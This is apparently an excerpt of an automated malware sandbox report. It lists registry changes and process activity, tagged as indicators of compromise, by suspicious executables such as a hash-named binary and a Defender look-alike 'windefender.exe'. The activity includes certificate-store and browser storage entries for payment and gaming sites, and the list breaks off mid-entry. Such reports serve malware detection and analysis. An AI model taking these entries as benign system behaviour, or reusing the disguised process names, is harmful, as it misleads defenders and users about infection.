\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1822 = "Russia TZ 1 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\epicgames.com\Total = "24" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\steampowered.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.paypal.com MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = d7bcaf62ec0ada01 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\c.paypal.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\paypalobjects.com\NumberOfSub = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.recaptcha.net\ = "64" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ce4c4662ec0ada01 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\epicgames.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\hcaptcha.com MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "360" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.epicgames.com\ = "24" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\epicgames.com\ = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\paypal.com\ = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\SplashScreen Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\epicgames.com\Total = "15" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4920 3Ut91WN.exe 4920 3Ut91WN.exe 5060 AppLaunch.exe 5060 AppLaunch.exe 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE 3248 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3248 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 632 Process not Found -
Suspicious behavior: MapViewOfSection 64 IoCs
pid Process 4920 3Ut91WN.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 6408 toolspub2.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 